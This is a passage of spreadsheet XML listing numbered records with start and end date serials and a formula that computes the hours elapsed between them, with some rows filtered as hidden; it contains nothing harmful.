        <v>43343.679884259262</v>
      </c>
      <c r="G1617" t="s">
        <v>25</v>
      </c>
      <c r="H1617" t="str">
        <f>TEXT(F1617-E1617,"[h]")</f>
        <v>1412</v>
      </c>
    </row>
    <row r="1618" spans="1:8" hidden="1">
      <c r="A1618" t="s">
        <v>4280</v>
      </c>
      <c r="B1618">
        <v>11487</v>
      </c>
      <c r="C1618" t="s">
        <v>4281</v>
      </c>
      <c r="D1618" t="s">
        <v>7</v>
      </c>
      <c r="E1618" s="1">
        <v>43284.717673611114</v>
      </c>
      <c r="F1618" s="1">
        <v>43285.754467592589</v>
      </c>
      <c r="G1618" t="s">
        <v>95</v>
      </c>
      <c r="H1618" t="str">
        <f>TEXT(F1618-E1618,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1619" spans="1:8">
      <c r="A1619" t="s">
        <v>4282</v>
      </c>
      <c r="B1619">
        <v>11484</v>
      </c>
      <c r="C1619" t="s">
        <v>4283</v>
      </c>
      <c r="D1619" t="s">
        <v>7</v>
      </c>
      <c r="E1619" s="1">
        <v>43284.173668981479</v>
      </c>
      <c r="F1619" s="1">
        <v>43312.828587962962</v>
      </c>
      <c r="G1619" t="s">
        <v>160</v>
      </c>
      <c r="H1619" t="str">
        <f>TEXT(F1619-E1619,"[h]")</f>
        <v>687</v>
      </c>
    </row>
    <row r="1620" spans="1:8" hidden="1">
      <c r="A1620" t="s">
        <v>4284</v>
      </c>
      <c r="B1620">
        <v>11483</v>
      </c>
      <c r="C1620" t="s">
        <v>4285</v>
      </c>
      <c r="D1620" t="s">
        <v>7</v>
      </c>
      <c r="E1620" s="1">
        <v>43284.149409722224</v>
      </c>
      <c r="F1620" s="1">
        <v>43287.207187499997</v>
      </c>
      <c r="G1620" t="s">
        <v>138</v>
      </c>
      <c r="H1620" t="str">
        <f>TEXT(F1620-E1620,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="1621" spans="1:8" hidden="1">
      <c r="A1621" t="s">
        <v>4286</v>
      </c>
      <c r="B1621">
        <v>11482</v>
      </c>
      <c r="C1621" t="s">
        <v>4287</v>
      </c>
      <c r="D1621" t="s">
        <v>7</v>
      </c>
      <c r="E1621" s="1">
        <v>43284.066527777781</v>
      </c>
      <c r="F1621" s="1">
        <v>43289.929918981485</v>
      </c>
      <c r="G1621" t="s">
        <v>255</v>
      </c>
      <c r="H1621" t="str">
        <f>TEXT(F1621-E1621,"[h]")</f>
        <v>140</v>
      </c>
    </row>
    <row r="1622" spans="1:8" hidden="1">
      <c r="A1622" t="s">
        <v>4288</v>
      </c>
      <c r="B1622">
        <v>11480</v>
      </c>
      <c r="C1622" t="s">
        <v>4289</v>
      </c>
      <c r="D1622" t="s">
        <v>7</v>
      </c>
      <c r="E1622" s="1">
        <v>43283.758229166669</v>
      </c>
      <c r="F1622" s="1">
        <v>43417.858402777776</v>
      </c>
      <c r="G1622" t="s">
        <v>883</v>
      </c>
      <c r="H1622" t="str">
        <f>TEXT(F1622-E1622,"[h]")</f>
        <v>3218</v>
      </c>
    </row>
    <row r="1623" spans="1:8">
      <c r="A1623" t="s">
        <v>4253</v>
      </c>
      <c r="B1623">
        <v>11479</v>
      </c>
      <c r="C1623" t="s">
        <v>4254</v>
      </c>
      <c r="D1623" t="s">
        <v>7</v>
      </c>
      <c r="E1623" s="1">
        <v>43283.655416666668</v>
      </c>
      <c r="F1623" s="1">
        <v>43286.669432870367</v>
      </c>
      <c r="G1623" t="s">
        <v>160</v>
      </c>
      <c r="H1623" t="str">
        <f>TEXT(F1623-E1623,"[h]")</f>
        <v>72</v>
      </c>
    </row>
    <row r="1624" spans="1:8" hidden="1">
      <c r="A1624" t="s">
        <v>4290</v>
      </c>
      <c r="B1624">
        <v>11476</v>
      </c>
      <c r="C1624" t="s">
        <v>4291</v>
      </c>
      <c r="D1624" t="s">
        <v>7</v>
      </c>
      <c r="E1624" s="1">
        <v>43283.249050925922</v>
      </c>
      <c r="F1624" s="1">
        <v>43389.381249999999</v>
      </c>
      <c r="G1624" t="s">
        <v>4292</v>
      </c>
      <c r="H1624" t="str">
        <f>TEXT(F1624-E1624,"[h]")</f>
        <v>2547</v>
      </c>
    </row>
    <row r="1625" spans="1:8">
      <c r="A1625" t="s">
        <v>4293</v>
      </c>
      <c r="B1625">
        <v>11475</v>
      </c>
      <c r="C1625" t="s">
        <v>4294</v>
      </c>
      <c r="D1625" t="s">
        <v>7</v>
      </c>
      <c r="E1625" s="1">
        <v>43283.234201388892</v>
      </c>
      <c r="F1625" s="1">
        <v>43631.867025462961</v>
      </c>
      <c r="G1625" t="s">
        <v>189</v>
      </c>
      <c r="H1625" t="str">
        <f>TEXT(F1625-E1625,"[h]")</f>
        <v>8367</v>
      </c>
    </row>
    <row r="1626" spans="1:8" hidden="1">
      <c r="A1626" t="s">
        <v>4295</v>
      </c>
      <c r="B1626">
        <v>11474</v>
      </c>
      <c r="C1626" t="s">
        <v>4296</v>
      </c>
      <c r="D1626" t="s">
        <v>7</v>
      </c>
      <c r="E1626" s="1">
        <v>43282.988055555557</v>
      </c>
      <c r="F1626" s="1">
        <v>43283.783946759257</v>
      </c>
      <c r="G1626" t="s">
        <v>3550</v>
      </c>
      <c r="H1626" t="str">
        <f>TEXT(F1626-E1626,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1627" spans="1:8" hidden="1">
      <c r="A1627" t="s">
        <v>4297</v>
      </c>
      <c r="B1627">
        <v>11473</v>
      </c>
      <c r="C1627" t="s">
        <v>4298</v>
      </c>
      <c r="D1627" t="s">
        <v>7</v>
      </c>
      <c r="E1627" s="1">
        <v>43282.933368055557</v>
      </c>
      <c r="F1627" s="1">
        <v>43283.718877314815</v>
      </c>
      <c r="G1627" t="s">
        <v>174</v>
      </c>
      <c r="H1627" t="str">
        <f>TEXT(F1627-E1627,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1628" spans="1:8" hidden="1">
      <c r="A1628" t="s">
        <v>4299</v>
      </c>
      <c r="B1628">
        <v>11472</v>
      </c>
      <c r="C1628" t="s">
        <v>4300</v>
      </c>
      <c r="D1628" t="s">
        <v>7</v>
      </c>
      <c r="E1628" s="1">
        <v>43282.8984375</v>
      </c>
      <c r="F1628" s="1">
        <v>43283.84479166667</v>
      </c>
      <c r="G1628" t="s">
        <v>4301</v>
      </c>
      <c r="H1628" t="str">
        <f>TEXT(F1628-E1628,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1629" spans="1:8" hidden="1">
      <c r="A1629" t="s">
        <v>4302</v>
      </c>
      <c r="B1629">
        <v>11471</v>
      </c>
      <c r="C1629" t="s">
        <v>4303</v>
      </c>
      <c r="D1629" t="s">
        <v>7</v>
      </c>
      <c r="E1629" s="1">
        <v>43282.87060185185</v>
      </c>
      <c r="F1629" s="1">
        <v>43282.900694444441</v>
      </c>
      <c r="G1629" t="s">
        <v>43</v>
      </c>
      <c r="H1629" t="str">
        <f>TEXT(F1629-E1629,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1630" spans="1:8">
      <c r="A1630" t="s">
        <v>4304</v>
      </c>
      <c r="B1630">
        <v>11470</v>
      </c>
      <c r="C1630" t="s">
        <v>4305</v>
      </c>
      <c r="D1630" t="s">
        <v>7</v>
      </c>
      <c r="E1630" s="1">
        <v>43282.805173611108</v>
      </c>
      <c r="F1630" s="1">
        <v>43282.828668981485</v>
      </c>
      <c r="G1630" t="s">
        <v>160</v>
      </c>
      <c r="H1630" t="str">
        <f>TEXT(F1630-E1630,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1631" spans="1:8">
      <c r="A1631" t="s">
        <v>4265</v>
      </c>
      <c r="B1631">
        <v>11468</v>
      </c>
      <c r="C1631" t="s">
        <v>4266</v>
      </c>
      <c r="D1631" t="s">
        <v>7</v>
      </c>
      <c r="E1631" s="1">
        <v>43282.459282407406</v>
      </c>
      <c r="F1631" s="1">
        <v>43284.675092592595</v>
      </c>
      <c r="G1631" t="s">
        <v>16</v>
      </c>
      <c r="H1631" t="str">
        <f>TEXT(F1631-E1631,"[h]")</f>
        <v>53</v>
      </c>
    </row>
    <row r="1632" spans="1:8">
      <c r="A1632" t="s">
        <v>4306</v>
      </c>
      <c r="B1632">
        <v>11467</v>
      </c>
      <c r="C1632" t="s">
        <v>4307</v>
      </c>
      <c r="D1632" t="s">
        <v>7</v>
      </c>
      <c r="E1632" s="1">
        <v>43282.292569444442</v>
      </c>
      <c r="F1632" s="1">
        <v>43284.675092592595</v>
      </c>
      <c r="G1632" t="s">
        <v>16</v>
      </c>
      <c r="H1632" t="str">
        <f>TEXT(F1632-E1632,"[h]")</f>
        <v>57</v>
      </c>
    </row>
    <row r="1633" spans="1:8" hidden="1">
      <c r="A1633" t="s">
        <v>4308</v>
      </c>
      <c r="B1633">
        <v>11466</v>
      </c>
      <c r="C1633" t="s">
        <v>4309</v>
      </c>
      <c r="D1633" t="s">
        <v>7</v>
      </c>
      <c r="E1633" s="1">
        <v>43282.150625000002</v>
      </c>
      <c r="F1633" s="1">
        <v>43315.17</v>
      </c>
      <c r="G1633" t="s">
        <v>4310</v>
      </c>
      <c r="H1633" t="str">
        <f>TEXT(F1633-E1633,"[h]")</f>
        <v>792</v>
      </c>
    </row>
    <row r="1634" spans="1:8">
      <c r="A1634" t="s">
        <v>4311</v>
      </c>
      <c r="B1634">
        <v>11464</v>
      </c>
      <c r="C1634" t="s">
        <v>4312</v>
      </c>
      <c r="D1634" t="s">
        <v>7</v>
      </c>
      <c r="E1634" s="1">
        <v>43281.303101851852</v>
      </c>
      <c r="F1634" s="1">
        <v>43289.91983796296</v>
      </c>
      <c r="G1634" t="s">
        <v>16</v>
      </c>
      <c r="H1634" t="str">
        <f>TEXT(F1634-E1634,"[h]")</f>
        <v>206</v>
      </c>
    </row>
    <row r="1635" spans="1:8" hidden="1">
      <c r="A1635" t="s">
        <v>4313</v>
      </c>
      <c r="B1635">
        <v>11463</v>
      </c>
      <c r="C1635" t="s">
        <v>4314</v>
      </c>
      <c r="D1635" t="s">
        <v>7</v>
      </c>
      <c r="E1635" s="1">
        <v>43281.166990740741</v>
      </c>
      <c r="F1635" s="1">
        <v>43281.571261574078</v>
      </c>
      <c r="G1635" t="s">
        <v>3690</v>
      </c>
      <c r="H1635" t="str">
        <f>TEXT(F1635-E1635,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1636" spans="1:8" hidden="1">
      <c r="A1636" t="s">
        <v>4315</v>
      </c>
      <c r="B1636">
        <v>11462</v>
      </c>
      <c r="C1636" t="s">
        <v>4316</v>
      </c>
      <c r="D1636" t="s">
        <v>7</v>
      </c>
      <c r="E1636" s="1">
        <v>43281.00439814815</v>
      </c>
      <c r="F1636" s="1">
        <v>43284.37127314815</v>
      </c>
      <c r="G1636" t="s">
        <v>373</v>
      </c>
      <c r="H1636" t="str">
        <f>TEXT(F1636-E1636,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="1637" spans="1:8" hidden="1">
      <c r="B1637">
        <v>11461</v>
      </c>
      <c r="C1637" t="s">
        <v>4317</v>
      </c>
      <c r="D1637" t="s">
        <v>7</v>
      </c>
      <c r="E1637" s="1">
        <v>43280.937592592592</v>
      </c>
      <c r="F1637" s="1">
        <v>43280.993726851855</v>
      </c>
      <c r="G1637" t="s">
        <v>998</v>
      </c>
      <c r="H1637" t="str">
        <f>TEXT(F1637-E1637,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1638" spans="1:8" hidden="1">
      <c r="A1638" t="s">
        <v>4318</v>
      </c>
      <c r="B1638">
        <v>11459</v>
      </c>
      <c r="C1638" t="s">
        <v>4319</v>
      </c>
      <c r="D1638" t="s">
        <v>7</v>
      </c>
      <c r="E1638" s="1">
        <v>43280.930972222224</v>
      </c>
      <c r="F1638" s="1">
        <v>43281.143217592595</v>
      </c>
      <c r="G1638" t="s">
        <v>998</v>
      </c>
      <c r="H1638" t="str">
        <f>TEXT(F1638-E1638,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1639" spans="1:8" hidden="1">
      <c r="A1639" t="s">
        <v>4320</v>
      </c>
      <c r="B1639">
        <v>11458</v>
      </c>
      <c r="C1639" t="s">
        <v>4321</v>
      </c>
      <c r="D1639" t="s">
        <v>7</v>
      </c>
      <c r="E1639" s="1">
        <v>43280.786956018521</v>
      </c>
      <c r="F1639" s="1">
        <v>43413.994618055556</v>
      </c>
      <c r="G1639" t="s">
        <v>4322</v>
      </c>
      <c r="H1639" t="str">
        <f>TEXT(F1639-E1639,"[h]")</f>
        <v>3196</v>
      </c>
    </row>
    <row r="1640" spans="1:8" hidden="1">
      <c r="A1640" t="s">
        <v>4323</v>
      </c>
      <c r="B1640">
        <v>11457</v>
      </c>
      <c r="C1640" t="s">
        <v>4324</v>
      </c>
      <c r="D1640" t="s">
        <v>7</v>
      </c>
      <c r="E1640" s="1">
        <v>43280.784710648149</v>
      </c>
      <c r="F1640" s="1">
        <v>43546.906666666669</v>
      </c>
      <c r="G1640" t="s">
        <v>4325</v>
      </c>
      <c r="H1640" t="str">
        <f>TEXT(F1640-E1640,"[h]")</f>
        <v>6386</v>
      </c>
    </row>
    <row r="1641" spans="1:8" hidden="1">
      <c r="A1641" t="s">
        <v>4326</v>
      </c>
      <c r="B1641">
        <v>11456</v>
      </c>
      <c r="C1641" t="s">
        <v>4327</v>
      </c>
      <c r="D1641" t="s">
        <v>7</v>
      </c>
      <c r="E1641" s="1">
        <v>43280.631990740738</v>
      </c>
      <c r="F1641" s="1">
        <v>43472.594317129631</v>
      </c>
      <c r="G1641" t="s">
        <v>886</v>
      </c>
      <c r="H1641" t="str">
        <f>TEXT(F1641-E1641,"[h]")</f>
        <v>4607</v>
      </c>
    </row>
    <row r="1642" spans="1:8">
      <c r="A1642" t="s">
        <v>4267</v>
      </c>
      <c r="B1642">
        <v>11455</v>
      </c>
      <c r="C1642" t="s">
        <v>4268</v>
      </c>
      <c r="D1642" t="s">
        <v>7</v>
      </c>
      <c r="E1642" s="1">
        <v>43280.591180555559</v>
      </c>
      <c r="F1642" s="1">
        <v>43280.783495370371</v>
      </c>
      <c r="G1642" t="s">
        <v>4269</v>
      </c>
      <c r="H1642" t="str">
        <f>TEXT(F1642-E1642,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1643" spans="1:8" hidden="1">
      <c r="A1643" t="s">
        <v>4328</v>
      </c>
      <c r="B1643">
        <v>11454</v>
      </c>
      <c r="C1643" t="s">
        <v>4329</v>
      </c>
      <c r="D1643" t="s">
        <v>7</v>
      </c>
      <c r="E1643" s="1">
        <v>43280.568541666667</v>
      </c>
      <c r="F1643" s="1">
        <v>43695.845057870371</v>
      </c>
      <c r="G1643" t="s">
        <v>670</v>
      </c>
      <c r="H1643" t="str">
        <f>TEXT(F1643-E1643,"[h]")</f>
        <v>9966</v>
      </c>
    </row>
    <row r="1644" spans="1:8" hidden="1">
      <c r="A1644" t="s">
        <v>4330</v>
      </c>
      <c r="B1644">
        <v>11453</v>
      </c>
      <c r="C1644" t="s">
        <v>4331</v>
      </c>
      <c r="D1644" t="s">
        <v>7</v>
      </c>
      <c r="E1644" s="1">
        <v>43280.505416666667</v>
      </c>
      <c r="F1644" s="1">
        <v>43280.993194444447</v>
      </c>
      <c r="G1644" t="s">
        <v>4332</v>
      </c>
      <c r="H1644" t="str">
        <f>TEXT(F1644-E1644,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1645" spans="1:8" hidden="1">
      <c r="A1645" t="s">
        <v>4333</v>
      </c>
      <c r="B1645">
        <v>11450</v>
      </c>
      <c r="C1645" t="s">
        <v>4334</v>
      </c>
      <c r="D1645" t="s">
        <v>7</v>
      </c>
      <c r="E1645" s="1">
        <v>43280.144606481481</v>
      </c>
      <c r="F1645" s="1">
        <v>43307.631076388891</v>
      </c>
      <c r="G1645" t="s">
        <v>4069</v>
      </c>
      <c r="H1645" t="str">
        <f>TEXT(F1645-E1645,"[h]")</f>
        <v>659</v>
      </c>
    </row>
    <row r="1646" spans="1:8">
      <c r="A1646" t="s">
        <v>4272</v>
      </c>
      <c r="B1646">
        <v>11449</v>
      </c>
      <c r="C1646" t="s">
        <v>4273</v>
      </c>
      <c r="D1646" t="s">
        <v>7</v>
      </c>
      <c r="E1646" s="1">
        <v>43280.062210648146</v>
      </c>
      <c r="F1646" s="1">
        <v>43280.814467592594</v>
      </c>
      <c r="G1646" t="s">
        <v>2271</v>
      </c>
      <c r="H1646" t="str">
        <f>TEXT(F1646-E1646,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1647" spans="1:8" hidden="1">
      <c r="A1647" t="s">
        <v>4335</v>
      </c>
      <c r="B1647">
        <v>11446</v>
      </c>
      <c r="C1647" t="s">
        <v>4336</v>
      </c>
      <c r="D1647" t="s">
        <v>7</v>
      </c>
      <c r="E1647" s="1">
        <v>43279.874849537038</v>
      </c>
      <c r="F1647" s="1">
        <v>43298.208807870367</v>
      </c>
      <c r="G1647" t="s">
        <v>66</v>
      </c>
      <c r="H1647" t="str">
        <f>TEXT(F1647-E1647,"[h]")</f>
        <v>440</v>
      </c>
    </row>
    <row r="1648" spans="1:8" hidden="1">
      <c r="A1648" t="s">
        <v>4337</v>
      </c>
      <c r="B1648">
        <v>11444</v>
      </c>
      <c r="C1648" t="s">
        <v>4338</v>
      </c>
      <c r="D1648" t="s">
        <v>7</v>
      </c>
      <c r="E1648" s="1">
        <v>43279.79482638889</v>
      </c>
      <c r="F1648" s="1">
        <v>43283.112615740742</v>
      </c>
      <c r="G1648" t="s">
        <v>2948</v>
      </c>
      <c r="H1648" t="str">
        <f>TEXT(F1648-E1648,"[h]")</f>
        <v>79</v>
      </c>
    </row>
    <row r="1649" spans="1:8">
      <c r="A1649" t="s">
        <v>4339</v>
      </c>
      <c r="B1649">
        <v>11442</v>
      </c>
      <c r="C1649" t="s">
        <v>4340</v>
      </c>
      <c r="D1649" t="s">
        <v>7</v>
      </c>
      <c r="E1649" s="1">
        <v>43279.662627314814</v>
      </c>
      <c r="F1649" s="1">
        <v>43385.352453703701</v>
      </c>
      <c r="G1649" t="s">
        <v>189</v>
      </c>
      <c r="H1649" t="str">
        <f>TEXT(F1649-E1649,"[h]")</f>
        <v>2536</v>
      </c>
    </row>
    <row r="1650" spans="1:8">
      <c r="A1650" t="s">
        <v>4341</v>
      </c>
      <c r="B1650">
        <v>11440</v>
      </c>
      <c r="C1650" t="s">
        <v>4342</v>
      </c>
      <c r="D1650" t="s">
        <v>7</v>
      </c>
      <c r="E1650" s="1">
        <v>43279.563449074078</v>
      </c>
      <c r="F1650" s="1">
        <v>43281.14675925926</v>
      </c>
      <c r="G1650" t="s">
        <v>25</v>
      </c>
      <c r="H1650" t="str">
        <f>TEXT(F1650-E1650,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="1651" spans="1:8">
      <c r="A1651" t="s">
        <v>4343</v>
      </c>
      <c r="B1651">
        <v>11438</v>
      </c>
      <c r="C1651" t="s">
        <v>4344</v>
      </c>
      <c r="D1651" t="s">
        <v>7</v>
      </c>
      <c r="E1651" s="1">
        <v>43279.532708333332</v>
      </c>
      <c r="F1651" s="1">
        <v>43545.558078703703</v>
      </c>
      <c r="G1651" t="s">
        <v>16</v>
      </c>
      <c r="H1651" t="str">
        <f>TEXT(F1651-E1651,"[h]")</f>
        <v>6384</v>
      </c>
    </row>
    <row r="1652" spans="1:8" hidden="1">
      <c r="A1652" t="s">
        <v>4345</v>
      </c>
      <c r="B1652">
        <v>11436</v>
      </c>
      <c r="C1652" t="s">
        <v>4346</v>
      </c>
      <c r="D1652" t="s">
        <v>7</v>
      </c>
      <c r="E1652" s="1">
        <v>43279.344988425924</v>
      </c>
      <c r="F1652" s="1">
        <v>43324.71534722222</v>
      </c>
      <c r="G1652" t="s">
        <v>4347</v>
      </c>
      <c r="H1652" t="str">
        <f>TEXT(F1652-E1652,"[h]")</f>
        <v>1088</v>
      </c>
    </row>
    <row r="1653" spans="1:8" hidden="1">
      <c r="A1653" t="s">
        <v>4270</v>
      </c>
      <c r="B1653">
        <v>11434</v>
      </c>
      <c r="C1653" t="s">
        <v>4271</v>
      </c>
      <c r="D1653" t="s">
        <v>7</v>
      </c>
      <c r="E1653" s="1">
        <v>43279.103055555555</v>
      </c>
      <c r="F1653" s="1">
        <v>43279.157222222224</v>
      </c>
      <c r="G1653" t="s">
        <v>174</v>
      </c>
      <c r="H1653" t="str">
        <f>TEXT(F1653-E1653,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1654" spans="1:8" hidden="1">
      <c r="A1654" t="s">
        <v>4348</v>
      </c>
      <c r="B1654">
        <v>11432</v>
      </c>
      <c r="C1654" t="s">
        <v>4349</v>
      </c>
      <c r="D1654" t="s">
        <v>7</v>
      </c>
      <c r="E1654" s="1">
        <v>43278.915648148148</v>
      </c>
      <c r="F1654" s="1">
        <v>43281.5934837963</v>
      </c>
      <c r="G1654" t="s">
        <v>28</v>
      </c>
      <c r="H1654" t="str">
        <f>TEXT(F1654-E1654,"[h]")</f>
        <v>64</v>
      </c>
    </row>
    <row r="1655" spans="1:8" hidden="1">
      <c r="A1655" t="s">
        <v>4350</v>
      </c>
      <c r="B1655">
        <v>11431</v>
      </c>
      <c r="C1655" t="s">
        <v>4351</v>
      </c>
      <c r="D1655" t="s">
        <v>7</v>
      </c>
      <c r="E1655" s="1">
        <v>43278.815601851849</v>
      </c>
      <c r="F1655" s="1">
        <v>43280.814467592594</v>
      </c>
      <c r="G1655" t="s">
        <v>109</v>
      </c>
      <c r="H1655" t="str">
        <f>TEXT(F1655-E1655,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="1656" spans="1:8" hidden="1">
      <c r="A1656" t="s">
        <v>4352</v>
      </c>
      <c r="B1656">
        <v>11429</v>
      </c>
      <c r="C1656" t="s">
        <v>4353</v>
      </c>
      <c r="D1656" t="s">
        <v>7</v>
      </c>
      <c r="E1656" s="1">
        <v>43277.7655787037</v>
      </c>
      <c r="F1656" s="1">
        <v>43298.065150462964</v>
      </c>
      <c r="G1656" t="s">
        <v>831</v>
      </c>
      <c r="H1656" t="str">
        <f>TEXT(F1656-E1656,"[h]")</f>
        <v>487</v>
      </c>
    </row>
    <row r="1657" spans="1:8">
      <c r="A1657" t="s">
        <v>4354</v>
      </c>
      <c r="B1657">
        <v>11428</v>
      </c>
      <c r="C1657" t="s">
        <v>4355</v>
      </c>
      <c r="D1657" t="s">
        <v>7</v>
      </c>
      <c r="E1657" s="1">
        <v>43277.670370370368</v>
      </c>
      <c r="F1657" s="1">
        <v>43278.69091435185</v>
      </c>
      <c r="G1657" t="s">
        <v>22</v>
      </c>
      <c r="H1657" t="str">
        <f>TEXT(F1657-E1657,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1658" spans="1:8">
      <c r="A1658" t="s">
        <v>4356</v>
      </c>
      <c r="B1658">
        <v>11427</v>
      </c>
      <c r="C1658" t="s">
        <v>4357</v>
      </c>
      <c r="D1658" t="s">
        <v>7</v>
      </c>
      <c r="E1658" s="1">
        <v>43277.669930555552</v>
      </c>
      <c r="F1658" s="1">
        <v>43278.660127314812</v>
      </c>
      <c r="G1658" t="s">
        <v>1120</v>
      </c>
      <c r="H1658" t="str">
        <f>TEXT(F1658-E1658,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="1659" spans="1:8" hidden="1">
      <c r="A1659" t="s">
        <v>4358</v>
      </c>
      <c r="B1659">
        <v>11426</v>
      </c>
      <c r="C1659" t="s">
        <v>4359</v>
      </c>
      <c r="D1659" t="s">
        <v>7</v>
      </c>
      <c r="E1659" s="1">
        <v>43277.626550925925</v>
      </c>
      <c r="F1659" s="1">
        <v>43278.69091435185</v>
      </c>
      <c r="G1659" t="s">
        <v>109</v>
      </c>
      <c r="H1659" t="str">
        <f>TEXT(F1659-E1659,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="1660" spans="1:8" hidden="1">
      <c r="A1660" t="s">
        <v>4360</v>
      </c>
      <c r="B1660">
        <v>11425</v>
      </c>
      <c r="C1660" t="s">
        <v>4361</v>
      </c>
      <c r="D1660" t="s">
        <v>7</v>
      </c>
      <c r="E1660" s="1">
        <v>43277.28979166667</v>
      </c>
      <c r="F1660" s="1">
        <v>43280.597719907404</v>
      </c>
      <c r="G1660" t="s">
        <v>255</v>
      </c>
      <c r="H1660" t="str">
        <f>TEXT(F1660-E1660,"[h]")</f>
        <v>79</v>
      </c>
    </row>
    <row r="1661" spans="1:8" hidden="1">
      <c r="A1661" t="s">
        <v>4362</v>
      </c>
      <c r="B1661">
        <v>11424</v>
      </c>
      <c r="C1661" t="s">
        <v>4363</v>
      </c>
      <c r="D1661" t="s">
        <v>7</v>
      </c>
      <c r="E1661" s="1">
        <v>43277.23847222222</v>
      </c>
      <c r="F1661" s="1">
        <v>43278.733067129629</v>
      </c>
      <c r="G1661" t="s">
        <v>2200</v>
      </c>
      <c r="H1661" t="str">
        <f>TEXT(F1661-E1661,"[h]")</f>
        <v>35</v>
      </c>
    </row>
    <row r="1662" spans="1:8" hidden="1">
      <c r="A1662" t="s">
        <v>4364</v>
      </c>
      <c r="B1662">
        <v>11422</v>
      </c>
      <c r="C1662" t="s">
        <v>4365</v>
      </c>
      <c r="D1662" t="s">
        <v>7</v>
      </c>
      <c r="E1662" s="1">
        <v>43276.975706018522</v>
      </c>
      <c r="F1662" s="1">
        <v>43332.687465277777</v>
      </c>
      <c r="G1662" t="s">
        <v>2027</v>
      </c>
      <c r="H1662" t="str">
        <f>TEXT(F1662-E1662,"[h]")</f>
        <v>1337</v>
      </c>
    </row>
    <row r="1663" spans="1:8" hidden="1">
      <c r="A1663" t="s">
        <v>4366</v>
      </c>
      <c r="B1663">
        <v>11414</v>
      </c>
      <c r="C1663" t="s">
        <v>4367</v>
      </c>
      <c r="D1663" t="s">
        <v>7</v>
      </c>
      <c r="E1663" s="1">
        <v>43275.816435185188</v>
      </c>
      <c r="F1663" s="1">
        <v>43276.89025462963</v>
      </c>
      <c r="G1663" t="s">
        <v>831</v>
      </c>
      <c r="H1663" t="str">
        <f>TEXT(F1663-E1663,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="1664" spans="1:8" hidden="1">
      <c r="A1664" t="s">
        <v>4368</v>
      </c>
      <c r="B1664">
        <v>11410</v>
      </c>
      <c r="C1664" t="s">
        <v>4369</v>
      </c>
      <c r="D1664" t="s">
        <v>7</v>
      </c>
      <c r="E1664" s="1">
        <v>43273.643148148149</v>
      </c>
      <c r="F1664" s="1">
        <v>43322.937256944446</v>
      </c>
      <c r="G1664" t="s">
        <v>255</v>
      </c>
      <c r="H1664" t="str">
        <f>TEXT(F1664-E1664,"[h]")</f>
        <v>1183</v>
      </c>
    </row>
    <row r="1665" spans="1:8" hidden="1">
      <c r="A1665" t="s">
        <v>4370</v>
      </c>
      <c r="B1665">
        <v>11409</v>
      </c>
      <c r="C1665" t="s">
        <v>4371</v>
      </c>
      <c r="D1665" t="s">
        <v>7</v>
      </c>
      <c r="E1665" s="1">
        <v>43273.584247685183</v>
      </c>
      <c r="F1665" s="1">
        <v>43273.605509259258</v>
      </c>
      <c r="G1665" t="s">
        <v>1477</v>
      </c>
      <c r="H1665" t="str">
        <f>TEXT(F1665-E1665,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1666" spans="1:8">
      <c r="A1666" t="s">
        <v>4278</v>
      </c>
      <c r="B1666">
        <v>11406</v>
      </c>
      <c r="C1666" t="s">
        <v>4279</v>
      </c>
      <c r="D1666" t="s">
        <v>7</v>
      </c>
      <c r="E1666" s="1">
        <v>43272.948784722219</v>
      </c>
      <c r="F1666" s="1">
        <v>43280.613854166666</v>
      </c>
      <c r="G1666" t="s">
        <v>16</v>
      </c>
      <c r="H1666" t="str">
        <f>TEXT(F1666-E1666,"[h]")</f>
        <v>183</v>
      </c>
    </row>
    <row r="1667" spans="1:8">
      <c r="A1667" t="s">
        <v>4372</v>
      </c>
      <c r="B1667">
        <v>11405</v>
      </c>
      <c r="C1667" t="s">
        <v>4373</v>
      </c>
      <c r="D1667" t="s">
        <v>7</v>
      </c>
      <c r="E1667" s="1">
        <v>43272.786898148152</v>
      </c>
      <c r="F1667" s="1">
        <v>43272.86146990741</v>
      </c>
      <c r="G1667" t="s">
        <v>16</v>
      </c>
      <c r="H1667" t="str">
        <f>TEXT(F1667-E1667,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1668" spans="1:8" hidden="1">
      <c r="A1668" t="s">
        <v>4374</v>
      </c>
      <c r="B1668">
        <v>11403</v>
      </c>
      <c r="C1668" t="s">
        <v>4375</v>
      </c>
      <c r="D1668" t="s">
        <v>7</v>
      </c>
      <c r="E1668" s="1">
        <v>43272.744571759256</v>
      </c>
      <c r="F1668" s="1">
        <v>43272.79478009259</v>
      </c>
      <c r="G1668" t="s">
        <v>51</v>
      </c>
      <c r="H1668" t="str">
        <f>TEXT(F1668-E1668,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1669" spans="1:8" hidden="1">
      <c r="A1669" t="s">
        <v>4376</v>
      </c>
      <c r="B1669">
        <v>11398</v>
      </c>
      <c r="C1669" t="s">
        <v>4377</v>
      </c>
      <c r="D1669" t="s">
        <v>7</v>
      </c>
      <c r="E1669" s="1">
        <v>43272.180914351855</v>
      </c>
      <c r="F1669" s="1">
        <v>43289.829953703702</v>
      </c>
      <c r="G1669" t="s">
        <v>4378</v>
      </c>
      <c r="H1669" t="str">
        <f>TEXT(F1669-E1669,"[h]")</f>
        <v>423</v>
      </c>
    </row>
